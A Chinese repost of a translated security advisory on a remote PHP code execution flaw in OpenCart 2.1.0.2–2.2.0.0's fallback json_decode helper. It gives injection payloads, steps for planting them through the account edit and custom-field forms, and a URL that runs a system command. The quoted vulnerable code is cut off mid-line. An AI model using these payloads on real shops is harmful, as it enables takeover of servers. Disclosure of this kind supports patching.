OpenCartjson_decode函数中存在远程PHP代码执行漏洞
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了OpenCartjson_decode函数中存在远程PHP代码执行漏洞,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1526字,纯文字阅读大概需要3分钟。
内容图文
![OpenCartjson_decode函数中存在远程PHP代码执行漏洞](/upload/InfoBanner/zyjiaocheng/206/8acc410c27204817871acc317a136cf0.jpg)
分享到:
最近,安全研究人员Naser Farhadi(Twitter: @naserfarhadi)发现OpenCart json_decode函数中存在远程PHP代码执行漏洞,涉及到的版本有2.1.0.2 到 2.2.0.0 (最新版本)
漏洞存在于 /upload/system/helper/json.php中,其中有这段代码
# /upload/system/helper/json.php$match = '/".*?(?其中通过json进行了函数的创建,而json_decode函数可被利用
这里是几个简单的测试例子
var_dump(json_decode('{"ok":"1"."2"."3"}'));
var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
在真实场景中,可以通过/index.php?route=account/edit进行利用
例如将$_SERVER[HTTP_USER_AGENT]作为姓名填写进去,保存(需要重复两次)
之后当管理员访问管理面板时,他会在最近活动中本应显示你的姓名的地方看到他自己的UserAgent
另一个例子是在account/edit 或者 account/register 中的 custom_field ,在这里进行利用可能是最合适的
如果管理员在/admin/index.php?route=customer/custom_field中添加了一个自定义的区域用于电话号码之类的额外信息
你就可以直接注入你的代码在这个custom_field中
例如将{$_GET[b]($_GET[c])}填写到这个custom_field中,保存
然后访问
http://host/shop_directory/index.php?route=account/edit&b=system&c=ls
你会看到代码被正确执行了
需要注意的是,这种利用方式只会在 PHP JSON扩展没有安装的情况下有效
本文由 360安全播报 翻译,转载请注明“转自360安全播报”,并附上链接。
原文链接:http://seclists.org/bugtraq/2016/Apr/61
内容总结
以上是互联网集市为您收集整理的OpenCartjson_decode函数中存在远程PHP代码执行漏洞全部内容,希望文章能够帮你解决OpenCartjson_decode函数中存在远程PHP代码执行漏洞所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。